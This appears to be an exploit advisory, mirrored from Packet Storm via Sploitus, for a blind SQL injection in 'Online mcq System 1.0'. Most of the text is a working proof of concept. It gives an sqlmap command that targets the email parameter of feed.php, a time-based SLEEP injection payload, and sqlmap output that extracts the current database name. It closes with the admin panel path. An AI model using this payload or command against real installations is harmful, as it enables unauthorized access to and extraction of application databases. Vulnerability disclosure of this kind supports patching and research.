Share
## https://sploitus.com/exploit?id=PACKETSTORM:181766
=============================================================================================================================================  
| # Title : Online mcq System 1.0 Blind Sql injection vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202304/kashipara.com_onlinemcq-zip.zip |  
=============================================================================================================================================  
  
[+] POC :  
  
[+] use Payload : E:\sqlmap>python sqlmap.py -u 127.0.0.1/onlinemcq/feed.php --method POST --data "submit=Submit&email=if" -p email --risk 3 --level 3 --dbms mysql --batch --current-db  
  
---  
Parameter: email (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: submit=Submit&email=if' AND (SELECT 2755 FROM (SELECT(SLEEP(5)))QbaB) AND 'daxF'='daxF  
---  
[16:18:22] [INFO] the back-end DBMS is MySQL  
[16:18:22] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions  
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y  
web application technology: PHP 8.0.30, Apache 2.4.58  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
[16:18:27] [INFO] fetching current database  
[16:18:27] [INFO] retrieved:  
[16:18:37] [INFO] adjusting time delay to 1 second due to good response times  
project  
current database: 'project'  
  
[+] PAnel : http://127.0.0.1/onlinemcq/admin.php  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================